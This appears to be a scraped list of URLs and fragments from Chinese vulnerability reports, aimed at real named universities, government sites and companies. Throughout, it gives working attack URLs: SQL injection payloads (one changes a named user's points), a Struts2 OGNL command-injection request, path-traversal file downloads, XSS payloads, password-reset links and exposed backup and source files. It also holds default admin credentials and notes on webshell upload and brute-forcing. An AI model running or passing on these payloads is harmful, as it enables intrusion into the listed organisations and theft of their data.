http://user.nipic.com/login.asp http://user.nipic.com/index.asp?open=event_prize_user.asp?leixing=1 http://user.nipic.com/index.asp?open=event_prize_user.asp?leixing=1;update%20az_user%20set%20gxfen=10%20where%20username='rainboyhi';-- https://www.newszeit.com/ www.qlqp2p.com http://www.china-sss.com/ http://www.china-sss.com/AirCust/ModifyNewPassword?sec=BE0D87EC3A1C77D6269E26C6C4DA07BFsplitStrEAC70A5C00049334D5C44CBB1204A0A1A143452127F795F5FB4E37C86907F5C1splitStr9B738C3935F8AB84DAF8DDB6BEAAB737 http://mall.china-sss.com/ http://mall.china-sss.com/member/findPwdModify?newPwd=805780&custId=9C0202325165 http://ce.atlenovo.com/ http://kfcstar.qq.com/ http://pfd.ceair.com/ http://pfd.ceair.com/finhome/index.html中 http://sut.edu.cn/ http://mail.jonhon.cn/ http://www.foowu365.com/news/html/?id=1%27%221000 http://180.138.196.131:8080/indexRedirect/AuditIndex.action http://www.ikuai8.com/ http://zh.ui.vmall.com//source/include/misc/misc_ranklist_index.php http://yqzb.wdjyzx.com/ http://www.gldjyq.cn:8133/yqgl/default.aspx http://219.159.68.143/default.aspx http://yjs.cdutcm.edu.cn/web_admin/index.aspx http://data.simuwang.com/dt_company_info.php?id=CO0000004P jfx.nju.edu.cn/sbweb/ zcc.nenu.edu.cn/sbweb/ sbcx.bjmu.edu.cn/sbweb/ http://sbapd.wh.sdu.edu.cn/ cn:8001/ http://202.197.224.86:8085/sbweb/ sbgl.sdu.edu.cn/sbweb/ http://zcc.nenu.edu.cn/sbweb/Userlogin.asp?uid=1&pwd=2 http://sbcx.bjmu.edu.cn/sbweb/Userlogin.asp?uid=1&pwd=2 http://211.65.116.58/sbweb/Userlogin.asp?uid=1&pwd=2 http://202.192.18.120/sbweb/index.asp http://124.172.245.220/ZTO/ http://124.172.245.220/ZTO/ZTO/GuangDong/Question.aspx http://www.gxhcte.gov.cn/plus/search/?key=111 www.fanli.com)通过sql注入可以随意登录,测试时登录的某些账户有V币和现金,站点高级别的用户可以提现和用V币充话费 www.pigai.org/?c=teacher&a=del&rid=XXXXXX http://big5.csair.com/SuniT/www.baidu.com/index.html http://big5.csair.com/SuniT/fish.cccsair.com/钓鱼.html http://olcs2.csair.com/upload.php http://www.canon.com.cn/support/service/etracking/checkValidateCode 
https://yidong.baidu.com/dana-na/auth/url_default/welcome.cgi https://webvpn.sina.com.cn/dana-na/auth/url_default/welcome.cgi https://vpn.renren-inc.com/dana-na/auth/url_default/welcome.cgi https://ksvpn.kingsoft.com/dana-na/auth/url_default/welcome.cgi http://www.zdnet.com.cn/ https://202.99.27.54/ http://www.cfachina.org中 www.cfachina.org http://www.cfachina.org http://g.chinaren.com http://box.pptv.com http://oa.syc.com.cn/OA/index/index.aspx http://xinhuachongming.com.cn/DSOA_TY/index/index.aspx http://221.199.203.230:9001/dsoa/index/index.aspx http://180.166.56.106/dsoa/index/index0.aspx http://sd.tobacco.com.cn/dsoa_kgj_web/index/index0.aspx http://oa.syc.com.cn/OA/help/HelpShow.aspx?id=1 http://oa.syc.com.cn/OA/ewebeditor/admin_login.asp,以默认admin:admin登陆,修改样式,记下样式名称,比如“s_exampleremote”,在“其它类型”中添加“aaspsp”, http://oa.syc.com.cn/OA/ewebeditor/upload.asp?action=save&type=FILE&style=s_exampleremote width:100% http://bbs.game.verycd.com http://bbs.db.changyou.com http://www.airchina.com http://210.41.218.62:8080/gmis/login.aspx http://210.41.218.62:8080/gmis/pygl/kbcx_jsprint.aspx?xq=19&xqmc=2013-2014春学期 http://www.wywk.cn/hwtUserAdmin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F http://modernsky.com/index.php?brand=1&cat=2&controller=site&t=news_records&w=0&action=news_pro_list&order=new http://www.modernsky.com/index.php?controller=site&action=news_pro_list&cat=1&order=new&t=news_artists&w=1 http://buy.modernsky.com/index.php?controller=ucenter&action=order_detail&id=22372『漏洞点』 http://buy.modernsky.com/index.php?controller=ucenter&action=order_detail&id=22378 http://news.yangtzeu.edu.cn)存在SQL注射 http://sss.bnu.edu.cn/iesadmin/login.php http://buy.modernsky.com/index.php?controller=simple&action=cart3 site:com.cn filetype:xls http://ryzp.kmust.edu.cn/rscsh/recrubaoming_new.aspx?id=00013503 site:com.cn filetype:xls http://www.mxwz.com/news/20140310/viwe_395.html 
http://www.mxwz.com/ http://gs.tju.edu.cn/zyb/news_detail.asp?id=731 www.emeraldinsight.com.cn www.emeraldinsight.com.cn http://www.emeraldinsight.com.cn http://bbs.kafan.cn/config/config_global.php.bak https://email.cnnp.com.cn/ http://www.nrdc.cn/our_program_flag.php?cid=256 http://cvnuser.test.kingdee.com/ http://cvnuser.test.kingdee.com/webapp/WEB-INF/classes/conf/spring/applicationContext-datasource.xml http://cvnuser.test.kingdee.com/webapp/ http://cvnuser.test.kingdee.com/phpMyadmin http://www.himedia-tech.cn www.himedia-tech.cn http://www.himedia-tech.cn http://www.jifenzhong.com/ http://www.jifenzhong.com/user/2144479/cover http://buy.modernsky.com//index.php?action=news_pro_list&cat=2&controller=site&order=new&t=news_records&w=0 http://buy.modernsky.com/upload/mmc.php http://buy.modernsky.com/upload/tmpuohap.php https://vpn.cumt.edu.cn https://vpn.bjfu.edu.cn https://vpn.xjtu.edu.cn http://my.damai.cn/account/myinfo http://per.damai.cn https://219.238.238.38/sort/list.aspx https://www.jw-assoc.com/products.html&c_id=82&d_id=104 http://minisite.youku.com/test/thumb/upload/ http://www.ncxf.gov.cn/search.php?do=search&s=ww&select=%E5%85%A8%E6%96%87%E6%A3%80%E7%B4%A2&imageField.x=24&imageField.y=10 http://sss.bnu.edu.cn/mainview.php?cid=1&id=16 http://www.skyexam.com/caar/FAQDetail.aspx?QAID=2 http://www.weifang.gov.cn:7001/wasadmin/ http://ins.xieshouwang.com.cn/Company/DownLoad?filename=1.txt&savename=..\..\web.config http://tc.homelink.com.cn/ http://www.scmb.gov.cn/1.asp http://www.scmb.gov.cn/6.asp http://www.scmb.gov.cn/9.asp http://www.scmb.gov.cn/2.asp http://www.scmb.gov.cn/admin_login.asp http://www.scmb.gov.cn/Admin_Database.asp http://www.scmb.gov.cn/Admin_Admin.asp http://www.scmb.gov.cn/Admin_Maillist.asp http://www.scmb.gov.cn/Admin_Message.asp http://www.scmb.gov.cn/Admin_UploadFile.asp http://www.scmb.gov.cn/admin_user.asp http://www.scmb.gov.cn/Admin_Login.asp http://www.scmb.gov.cn/conn.asp http://www.scmb.gov.cn/default.asp 
http://www.scmb.gov.cn/editor.asp http://www.scmb.gov.cn/function.asp http://www.scmb.gov.cn/inc/config.asp http://www.scmb.gov.cn/test.asp http://www.scmb.gov.cn/Upload_Dialog.asp http://www.scmb.gov.cn/upload_article.asp http://www.scmb.gov.cn/upfile_photo.asp http://www.scmb.gov.cn/upload_softpic.asp http://www.scmb.gov.cn/Upfile_SoftPic.asp http://www.scmb.gov.cn/Upfile_Article.asp http://www.scmb.gov.cn/Upload_SoftPic.asp http://www.scmb.gov.cn/Upload_AdPic.asp http://www.scmb.gov.cn/Upfile_Dialog.asp http://www.scmb.gov.cn/Upfile_OrderPic.asp http://www.scmb.gov.cn/Upfile_AdPic.asp http://www.scmb.gov.cn/user_login.asp http://www.scmb.gov.cn/User_GetPassword.asp http://www.scmb.gov.cn/upfile_soft.asp http://www.scmb.gov.cn/Upfile_Soft.asp http://www.scmb.gov.cn/test.asp http://www.scmb.gov.cn/top.asp http://www.scmb.gov.cn/userlist.asp http://www.scmb.gov.cn/Index.asp http://www.scmb.gov.cn/index.asp http://www.scmb.gov.cn/index.html http://www.scmb.gov.cn/default.htm http://www.scmb.gov.cn/maillist.mdb http://www.scmb.gov.cn/wwwroot.rar http://www.scmb.gov.cn/test.txt http://www.scmb.gov.cn/index.htm http://www.scmb.gov.cn/UploadSoft/ http://www.scmb.gov.cn/New/ http://www.scmb.gov.cn/Images/ http://www.scmb.gov.cn/Inc/ http://www.scmb.gov.cn/DataBackup/ http://www.scmb.gov.cn/img/ http://www.scmb.gov.cn/Admin_Admin.asp http://www.scmb.gov.cn/Admin_Database.asp http://www.scmb.gov.cn/aspnet_client/system_web/ http://www.scmb.gov.cn/aspnet_client/system_web/2_0_50727/ http://www.scmb.gov.cn/aspnet_client/ http://www.scmb.gov.cn/default.htm http://www.scmb.gov.cn/DataBackup/ http://www.scmb.gov.cn/images/ http://www.scmb.gov.cn/index.html http://www.scmb.gov.cn/index.htm http://www.scmb.gov.cn/wwwroot.rar http://www.scmb.gov.cn/test.txt http://www.scmb.gov.cn/default.asp http://www.scmb.gov.cn/index.html http://www.scmb.gov.cn/admin_admin.asp http://www.scmb.gov.cn/Admin_Database.asp http://www.scmb.gov.cn/Admin_Maillist.asp http://www.scmb.gov.cn/maillist.mdb 
http://www.scmb.gov.cn/Admin_Message.asp http://www.scmb.gov.cn/admin_login.asp http://www.scmb.gov.cn/admin_uploadfile.asp http://www.scmb.gov.cn/UserList.asp http://www.scmb.gov.cn/conn.asp http://www.scmb.gov.cn/default.htm http://www.scmb.gov.cn/function.asp http://www.scmb.gov.cn/admin_user.asp http://www.scmb.gov.cn/Upfile_SoftPic.asp http://www.scmb.gov.cn/upfile_soft.asp http://www.scmb.gov.cn/test.asp http://www.scmb.gov.cn/user_login.asp http://www.scmb.gov.cn/vote.asp http://www.scmb.gov.cn/wwwroot.rar http://www.scmb.gov.cn/top.asp http://www.scmb.gov.cn/User_GetPassword.asp http://www.scmb.gov.cn/end.asp http://www.scmb.gov.cn/upfile_Dialog.asp http://www.scmb.gov.cn/1.asp http://www.scmb.gov.cn/test.txt http://www.scmb.gov.cn/upfile_photo.asp http://www.scmb.gov.cn/upfile_article.asp http://www.scmb.gov.cn/index.asp http://www.scms.gov.cn/Pic.aspx http://www.scztb.gov.cn/index.html http://www.scztb.gov.cn/robots.txt http://www.scztb.gov.cn/index.html http://www.scztb.gov.cn/robots.txt http://www.scztb.gov.cn/index.html http://www.scztb.gov.cn/robots.txt http://www.scmb.gov.cn/wwwroot.rar http://www.scmb.gov.cn/1.asp http://uestat.video.qiyi.com/ http://118.85.207.84/。弱口令猜解半天无果。突然,我发现了新大陆: http://www.gtcws.com/system/system.asp http://www.gtcws.com/expert/expertquery.asp content://com.antiy.avlpro.MyProvider,却无权限暴露在外 http://localhost/index.php?c=ajax&a=member_login&template=/../../config.php http://sqb.scu.edu.cn/check.asp http://sesuen.scu.edu.cn/admin/login.aspx http://kqjzw.scu.edu.cn/admin/admin_login.asp http://gobuild.io/download/github.com/titanous/heartbleeder http://tjxt.kmust.edu.cn/ http://tjxt.kmust.edu.cn/manage/ http://tjxt.kmust.edu.cn/manage/UserManagement.aspx http://tjxt.kmust.edu.cn/manage/login.aspx http://tjxt.kmust.edu.cn/manage/AdminLeft.aspx https://webmail.eascs.com存在openssl漏洞 http://oa.eascs.com/eaoa/loginAction.do http://www.xnepb.gov.cn/ site:gov.cn filetype:xls http://mail.ha.chinamobile.com/sms/ 
http://www.math.pku.edu.cn/is/oldversion/show.php?id=200 http://saa.scu.edu.cn:80/xueyuangk/NewsArticle.aspx?newsid=57 http://club.ellechina.com/ http://cps.miqi.cn/login http://sunshine.tedc.cn:8080/sunshine-1.0/login http://www.infojiading.cn/ http://www.lidapoly.edu.cn/job/asearch.asp http://job.smic.edu.cn/EntRegister1.asp http://jiuye.sbs.edu.cn/EnterpriseReg.asp http://www.lidapoly.edu.cn/job/asearch.asp为例: http://www.lidapoly.edu.cn/job/asearch.asp https://61.144.224.101 http://xbkfy.scu.edu.cn/rkyj.zip http://xbkfy.scu.edu.cn/db.zip http://xbkfy.scu.edu.cn/website.zip http://www.pt80.net/ http://point.gzgwbn.net.cn/newsinfo.aspx?nid=72 https://mail.kejxer.eu/iredadmin/ https://brtaxi.hu/iredadmin/ https://to-text.ru/iredadmin/ https://www.rnmsrv.de/iredadmin http://cwrh.scu.edu.cn/install/ http://www.magicwinmail.com/success.php列出了用户,赫然看到 https://61.144.225.113/ http://st.scu.edu.cn:80/kyjd/DocumentView.aspx?ArticleShowID=6 http://st.scu.edu.cn/admin/admin_link.aspx http://marketing.352.com/ http://www.11185buy.com/web.rar http://www.yanjing.com.cn/admin/login.asp site:XXXX.com.cn http://www.gonbes.com/newsdetail.php?id=464 http://flashdata.2006.sina.com.cn/index.php?area_id=1 http://flashdata.2006.sina.com.cn/index.php?level1_id=7&level2_id=118 http://flashdata.2006.sina.com.cn/index.php?area_id=1%20and%20UpdateXML%281,CONCAT%280x5b,mid%28%28SELECT%20version%28%29%29,1,32%29,0x5d%29,1%29%23 http://lib.uoh.edu.cn/xingdongfan/db.asp http://rz.qq.com/json.php?mod=auth&act=nickname&callback=checkLoginCB&t=1397270961106 http://zsb.ybu.edu.cn/index.php?id=134的搜索框中构造sql语句,可以查询出招生信息,搜索框限制了字符长度,但是没有对特殊字符进行过滤,而且仅仅只是在浏览器端限制了字符长度,可以通过抓包的方式绕过长度限制 http://wooyun.org/bugs/wooyun-2010-049385 http://performance.wanda.cn http://www.wandaperformance.com/FileUpload http://www.google.de/#newwindow=1&q=inurl:enterprise-info!getCompanyInfo.action chrome://newtab/ http://jp.zzuli.edu.cn/shigong/BoardView.asp?id=11 www.wooyun.org 
http://jszyzx.njau.edu.cn/XCAdmin/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/aspx/connector.aspx http://heart.njau.edu.cn/db/class.php?class=1 http://weixin.zgsj.com/ http://oa.352.com:88/db/ http://www.hymaco.com:8080/hyoa2/file/fileList.do?method=FileList&Vis1=1&Vis2=1&Vis3=0&Vis4=0&filePath=D://HYOA//hyoa2//WebRoot//WEB-INF http://zfxxgk.beijing.gov.cn/columns/91/5/fgdyna.prDownload.prDownLoadDynaInfoAttch.do?ATCH_ID=81434+and+1=1 http://210.75.211.5/columns/91/5/fgdyna.prDownload.prDownLoadDynaInfoAttch.do?ATCH_ID=81250 paimai.wwtx.cn/auction.php?area=555&category_chi=0&category_fa=1&city=San%20Francisco&keyword=1&province=NY http://www.352.com/news/61546.jhtml http://oa.352.com:517/ http://oa.352.com:88/phpinfo.php http://oa.352.com:88/test.php http://mzone.nurunchina.com/.svn/entries http://i.ziroom.com/后 http://i.ziroom.com/index.php?uri=contract/receipt&contract_code=BJCW81308250155&pay_plan=1 http://vojradio.vojs.cn/ http://vojradio.vojs.cn/admin/menu.asp http://vojradio.vojs.cn/vod/ http://vojradio.vojs.cn/vod/1.asp;.jpg这个。丢到菜刀没想到真的可以进去了 http://vojradio.vojs.cn/ys.html www.discoveryland.cn http://fj.189.cn/biz/service/transaction/general_tp_register.jsp http://fj.189.cn/biz/service/transaction/uploadfile/file/1397444009862.jsp http://m.chkee.com/wap2/user_space.php?sid=&uid=1 http://ihwr.hydr.tsinghua.edu.cn话说这个网站,是使用了dedecms的程序。然后把找到它账号密码的EXP相信大家都懂的! 
http://chengjiao.fosu.edu.cn/zk/denglu.asp http://peixun.bgpintl.com/web/New.aspx?typeid=14 http://www.president-starbucks.com.cn/index.html http://bsm.wandafilm.com/manager/html https://vpn.telecomjs.com/prx/000/http/localhost/login‎ http://fp.huafans.cn/?f=events&on=show&id=7090 http://fp.huafans.cn/admin/upload.php http://www.0798.org/tools/pianfang/ http://zjukjc.zju.edu.cn/command/login.jsp http://zjukjc.zju.edu.cn/command/auth/loginname-getback.jsp http://jxw.giant.com.cn可上传脚本文件,从而得到WEBSHELL,服务器未对各分站进行权限划分导致可以跨到主站及其他分站程序 http://202.4.130.200:81/ http://www.cpac.com.cn/ http://www.cpac.com.cn/manage/ http://xjd.tcl.com:8008/ user.nipic.com/index.asp http://user.nipic.com/shoucang_kind.asp?check=add http://www.kaixinzuowen.com/uc_server http://hjhg.tjpu.edu.cn/down/class/index.php?page=1&catid=9&myord=dtime&myshownums=&showtj=&author=&key= http://hjhg.tjpu.edu.cn/base/admin/index.php http://www.xhfda.gov.cn/xhsp/hwcrm/login.php https://passport.tiancity.com/Login.ashx?jsoncallback=jsonp1397313384615&id=账号&pw=MD5加密后的密码&cp=&mt=<=0&st=1254&fl= http://www.zzzydj.gov.cn/Data/ http://md.ycmygs.com/publicAddresslistQuery.action http://tieba.baidu.com/p/2803224738 ip:60.13.169.xxx http://demo.zoomla.cn/user/AppBack.aspx?type=QQ&openId= http://activity.laiwang.com/ http://activity.laiwang.com/internal/Explorer?context=&fn=Resources&resource=%2FWEB-INF%2F http://activity.laiwang.com/internal/Webx/Info/System+Properties?spm=0.0.0.0.9gM2n4 http://xfjs.sicnu.edu.cn/admin/Login.html http://foodstory.benlai.com/使用的是wordpress,/wp-admin为后台,?author=$num可遍历用户名 coding:utf-8 http://www.dhc.net.cn/gds/csearch.jsp?ccd=10202000 http://smbk.forestry.gov.cn/login.jsp http://smbk.forestry.gov.cn:8099/lyj/txt/download.jsp?fileID=12305 http://in.sdo.com/wp-admin/后台对吧?之前我已经搞过一个账号的了。。但是感觉不给力。然后昨天晚上开了个8H的服务器去爆破了点用户出来 http://wenku.baidu.com/link?url=M6sMQbMxNeHCvkQRoES7u_noUc10m6DHDDGFok88bXIsUv8LAK4thkkluQJ_3wKoOJBl4TttTj1-v-zoSLyISD6wy2v36aen5ND3yc0v13S http://www.17558.net/post/731.html 
http://pan.baidu.com/s/1h6ftE http://gy.pylt.hk/ http://www.mxtx.net/ http://www.zjlovebank.com/db/%23uxdb.asa http://i.links.cn/robots.asp?weburl=127.0.0.1&pagecode= http://tool.zzbaike.com/spider http://seo.seowhy.com/spider/127.0.0.1 http://www.17ce.com/ http://aiwo.mobileclub.cn/user!goLogin.action http://xgui.sdo.com/news/ListNews.aspx?channel=18,19,21x&page=1 http://xgui.sdo.com/news/ListNews.aspx?channel=18,19,21%29%20and%201=1--&page=1 http://xgui.sdo.com/news/ListNews.aspx?channel=18,19,21%29%20and%201=2--&page=1 http://bbs.uuu9..com http://igame.qq.com/world/rank.php?all=1 http://igame.qq.com/qciroeha http://igame.qq.com/home/sendmsg.php?qq=qciroeha http://www.examw.com/ http://class.examw.com/player/teacher.asp?ClassID=105&tid=522414 http://class.examw.com/player/detail.asp?CourseID=5099&ClassID=20 http://web.2144.cn/cycs/zigw/server?sid=54 http://www.jzssfj.gov.cn/system/login.aspx www.cusdn.org.cn/zjwd/page_news_ck.php?pid=120101&eid=216 http://shop.178.com/search.php http://www.hbdaye.gov.cn/ http://www.nju.gov.cn:8080/ http://www.nju.gov.cn:8080/webuser/webuserupd.aspx?personid=211 http://www.nju.gov.cn:8080/webuser/webuserupd.aspx?personid=211 http://221.226.86.78/ http://imcs.vancl.com/robot/check-login.action http://imcs.vancl.com/robot/check-login.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://imcs.vancl.com/robot/bak.jsp http://www.cceen.com/showinfo.asp?o=88 http://www.lbxdrugs.com/lbxdrugs.rar http://sellwt.cytobacco.com/login.do?method=init https://www.chanet.com.cn/ http://npoapp.gongyi.qq.com/blog/add 
http://www.jinqiangjc.com/admin/login.php?gotopage=%2Fadmin%2Findex.php http://ztdl.hnkjedu.com.cn/webeditor/Admin_Login.asp编辑器- http://www.hnkjedu.cn/liuyan/data/xycmsbook.asp www.zjrb.cn http://83.133.124.214/lol.c http://love.mendale.com.cn/ http://love.mendale.com.cn/html/news/newsfast.aspx?MenuID=4&SearchInfo=1 http://love.mendale.com.cn/webmaster/Index.aspx http://www.zt-express.com/ http://manager.zt-express.com/system/main.aspx,上图中绿框内账号登陆成功 www.dean.gxnu.edu.cn http://baoyang.pahaoche.com/member/get_password/username/asd http://www.cwts.org/ http://dlib.ncedu.gov.cn/Books.aspx?kinds=001 http://dlib.ncedu.gov.cn/SearchResult.aspx?kinds=all&content=a https://61.147.117.218 alumni.zstu.edu.cn/xyzhxt/ xyzh.gxnu.edu.cn/xyzhxt/ alumni.ahu.edu.cn/xyzhxt/ xyzh.jsu.edu.cn/xyzhxt/‎ xiaoyouhui.szpt.edu.cn/xyzhxt/ http://soufun.com/zhaopin/index.php?act=locationList&loc=%C7%E0%B5%BA https://61.148.57.182 http://oa.cnaaa.com/main/login.asp http://www.hbnsbd.gov.cn:8080/system/manager/terminalLogin.do http://www.enkj.com/domaindo/ymdo-info.asp?id=XXX http://wan.tgbus.com/kaifu/search/1 http://qlgk.jingjiang.gov.cn/admin inurl:phantomCMS http://221.226.22.234:8088/phantomCMS/toSqwz.action?sid=2 http://www.jssqw.net/phantomCMS/toSqwz.action?sid=2 http://222.92.198.27/phantomCMS/toSqwz.action?sid=2 http://www.liuxiang.gov.cn/phantomCMS/toSqwz.action?sid= http://221.226.22.234:8088/phantomCMS/toSqwz.action?sid=2为例: http://221.226.22.234:8088/phantomCMS/tempScenario/zymjd/articleSearchList.jsp?sid=2&searStr=123%25%27 http://www.farmer.gov.cn/ http://bbs.g.pptv.com/thread-52017-1-1.html www.xiaoi.com)成立于2001年,是全球领先的智能机器人技术提供和平台运营商,拥有全球最大的智能机器人云服务平台,其直接和间接服务的用户在全球超过2亿。小i机器人(www.xiaoi.com)的网页版疑似存在命令执行。 
http://imcs.vancl.com/robot/check-login.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 site:bbs.hers.com.cn inurl:profile http://bbs.hers.com.cn/thread-59205741-1-1.html http://jxjy.bfa.edu.cn/bm/newslist.php?cid=7 http://202.102.41.37:8080/login/CmsSubmit.do http://202.102.41.36/login/login.do http://202.102.41.36/login/login.do http://202.102.41.159/robot/check-login.action http://202.102.41.159/robot/check-login.action http://202.102.41.153:80/Logout.action http://202.102.41.153:80/Logout.action http://202.102.41.160/robot/check-login.action http://202.102.41.160/robot/check-login.action http://202.102.41.207/robot/check-login.action http://202.102.41.235/doLogin.action http://202.102.41.235/doLogin.action http://online.sdu.edu.cn/news/article.php?pid=636526616 http://upload.jnby.com/ http://222.197.192.122/seeyon/main.do https://210.26.0.50/ http://fxy.xjtu.edu.cn/Show1.asp?id=204 http://fxy.xjtu.edu.cn/managesystem/editor/UploadFile/ http://kbs.cnki.net/other/lab.aspx?name=%E6%9D%90%E6%96%99 www.xzcz.gov.cn http://yjsy.nenu.edu.cn/ http://yyx.sicau.edu.cn/ https://61.150.40.166/?code=1 http://www.gs.edu.cn/ http://product.k12.com.cn/ http://www.google.de/#newwindow=1&q=inurl:cms/app/info/&start=10 http://www.wlyz.net/phpinfo.php http://www.sgedu.gov.cn/phpinfo.php http://www.wlsz.cn/phpinfo.php http://www.wledu.org/phpinfo.php http://sgyy.7659.com/database_info.php?id=10560 http://fknsg.7659.com/wp-admin/ http://www.xnsl.gov.cn/ http://www.hnacc.gov.cn/ http://14.23.152.207/admin/login.jsp,存在svn泄露,源码可读 http://14.23.152.207/.svn/text-base/autopub_log.jsp.svn-base 
http://www.chinahighway.gov.cn/ http://bbs.pcpop.com/forum.php?mod=viewthread&tid=10639870&extra= http://www.hnpost.com/E_AllUser.asp?order=time&order2=1 http://www.hnpost.com/web.rar,你懂的 http://www.hnpost.com/Ads/daima.asp?id=63 https://183.60.118.90 http://read.qidian.com/BookReader/.svn/entries www.miqi.cn http://www.miqi.cn http://db.catr.cn/mainpage.aspx http://xmldata.catr.cn/indexReal.jsp http://www.chinattl.com/ttlweb/display_A.aspx?id=2328 http://219.239.97.36/cn/showclass.asp?classid=187 http://219.239.97.36/cn/showclass.asp?classid=39 http://219.239.97.51/chinacc/ShowArticle.asp?ArticleID=1847 http://project.youku.com/fings/config/t.txt http://project.youku.com/fings/config/admin/ http://ods.vip.com/platform/plsmuser/login1.do http://business.china.com.cn/bsadmin/login.html http://11185.cn/ http://youth.cafuc.edu.cn/ http://www.ccag.cn/ http://www.ccag.cn/news.do?action=detail&id=201404091030287529 http://www.ccag.cn/webadmin/user.do?action=adm http://www.irissz.com/ http://203.86.28.246:81/stmsres/ http://218.64.59.73/stms/login.jsp http://kjgl.gzmed.gov.cn/stmsres/ http://pro.zhkgmx.gov.cn/stms/login.jsp http://researchnet.org/egrantweb/ http://www.kjxm.wst.hainan.gov.cn/stmsres/ http://pro.zhkgmx.gov.cn/stms/expert.jsp http://system.szexpert.gov.cn/stias/expertindex.jsp http://stias.szsitic.gov.cn/resstias/zxqyindex.html深圳市中小企业国际市场拓展资金管理系统 http://gxnsf.gxsti.net/stms/login.jsp https://kjyw.fskw.gov.cn/stmsres/ http://mmstms.gdsti.net/stms/main.jsp http://www.irissz.com/egrant.html http://218.64.59.73/stms/login.jsp http://218.64.59.73/stms/orgUser.do?action=vEdit&psn_code=34680 http://218.64.59.73/stms/orgUser.do?action=vEdit&psn_code=34678 http://218.64.59.73/stms/orgUser.do?action=vEdit&psn_code=34677 http://203.86.28.246:81/stmsres/ http://203.86.28.246:81/stms/orgUser.do?action=vEdit&psn_code=5903 http://203.86.28.246:81/stms/orgUser.do?action=vEdit&psn_code=5904 
http://big5.china.com.cn/gate/big5/jx.china.com.cn/html/tupian/xinwen/2014/0415/464.html http://game.weibo.com/avatar/interface/userAvatarList http://www.hyjbld.com/Admin_Login.asp http://210.51.19.39:8000/trac,应该是个项目系统吧 interface:http://210.51.19.39:28017, http://cnpl.ems.com.cn/index.jsp admin:123456 http://wapmail.wo.com.cn/register.wo http://jpkc.smu.edu.cn/nk/bbs/Data/ok.aspx http://jpkc.smu.edu.cn/nk/bbs/Data/ASPda.asp http://jpkc.smu.edu.cn/nk/bbs/Data/bug.asp http://218.249.130.74/download.fe?filePath=e:/OA/Media/TemplateOfTaohong//../../../OA/database/fe_app5.mdf http://cp.timber2005.com/examreport/exam_result_t.aspx?infoid=1&type=Exam_Result_info http://home.focus.cn/decor/class.php http://home.focus.cn/elite/designer_list.php http://www.hnyanling.gov.cn/main/video/videoList.jsp?subjectid=99999999 http://www.hnyanling.gov.cn/main/video/videoList.jsp?subjectid=3345 http://www.hnyanling.gov.cn/module/upPhoto/gethotMore.action?pagenum=1&subjectid=3415 http://trip.house.sina.com.cn/House/List/4?p=-50%20and%201=1 http://trip.house.sina.com.cn/House/List/4?p=-50%20and%201=2 http://joe.tom.com/joe_admin/login.php?gotopage=%2Fweiqi_admin%2F http://rz.game.tom.com/rzjfz_admin/login.php?gotopage=%2Frzjfz_admin%2F http://joe.game.tom.com/san.htm http://admin.wecity.co/login.action http://admin.tj.focus.cn/.bash_history http://admin.jn.focus.cn/.bash_history http://movie.damai.cn/ http://csldata.sports.sohu.com/admin.tar.gz http://adidas.sports.sohu.com/product_list.php http://golf.cctv.com http://202.117.3.62 http://202.117.3.62:5002/Login/LoginPageForuserB.aspx?SchoolName=%u897F%u5B89%u4EA4%u901A%u5927%u5B66&LogoutURL=http://202.117.3.62:5002/Default.htm site:bbs.lecai.com inurl:profile http://www.lecai.com/user/paypassword/update data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+ http://otrans.oppo.com/index.php?q=index/login http://service1.oppo.com:8088/Login.aspx?ReturnUrl=%2fDefault.aspx www.xxoo.com/utility/convert/data/config.inc.php 
http://pan.baidu.com/s/1qWBAH3m bar.2144.cn/home/photolist/uid/10046887/lid/1*/page/1 bar.2144.cn/darenSquare/getFriends/?addr=hello&gender=all&occupation=all&page=1&pageSize=20 bar.2144.cn/game/getGames/?callback=jQuery18107313595172017813_1397587756036&order=new&page=1&pageSize=24&type=pid&typeValue=1&_=1397587911285 bar.2144.cn/gameScore/getMonthRankList/?gid=1&page=1&pageSize=62&t=0.5064357866067439 bar.2144.cn/gameScore/getUserRecord/?asc=1&page=1&pageSize=16&sort=week&uid=1 bar.2144.cn/gameScore/getWeekRankList/?gid=1&page=1&pageSize=62&t=0.974383644759655 http://cc.focus.cn/common/modules/dmc/loupandyview.php?id=696 http://cc.focus.cn/common/modules/dmc/loupandyview.php?id=696 http://nj.focus.cn/common/modules/dmc/loupandyview.php?id=101081 http://jn.focus.cn/prjbbs/yezhu.php?ID=150117 http://jn.focus.cn/prjbbs/yezhu.php?ID=150117 http://www.szsccb.com/ http://www.szsccb.com/config.jsp http://home.focus.cn/common/modules/sjspk/sjspk.php?id=31 http://home.focus.cn/common/modules/sjspk/sjspk.php?id=31 http://house.focus.cn/common/modules/newscenter/road_show_new.php?id=4 http://house.focus.cn/common/modules/newscenter/road_show_new.php?id=4 http://shaoyang.focus.cn/common/modules/go2map/gis_result.php?map=id&data_id=2170095'%20order%20by%2015%23 http://shaoyang.focus.cn/common/modules/go2map/gis_result.php?map=id&data_id=2170095'%20order%20by%2016%23 http://bbs.cntv.cn http://bbs.cntv.cn/cctvapi/Comment/english.php?id= http://www.07073.com/plus/flink.php http://f.dangdang.com/search/search.php?type=1&keyword=%3Csvg+onload%3Dalert%281%29%3E http://m.dangdang.com/gw_search.php?key=%3Csvg+onload%3Dalert%281%29%3E&so_gouwu=%E6%90%9C%E7%B4%A2&sid=2a68a94309929941&ref=index http://www.zjs.zju.edu.cn/ 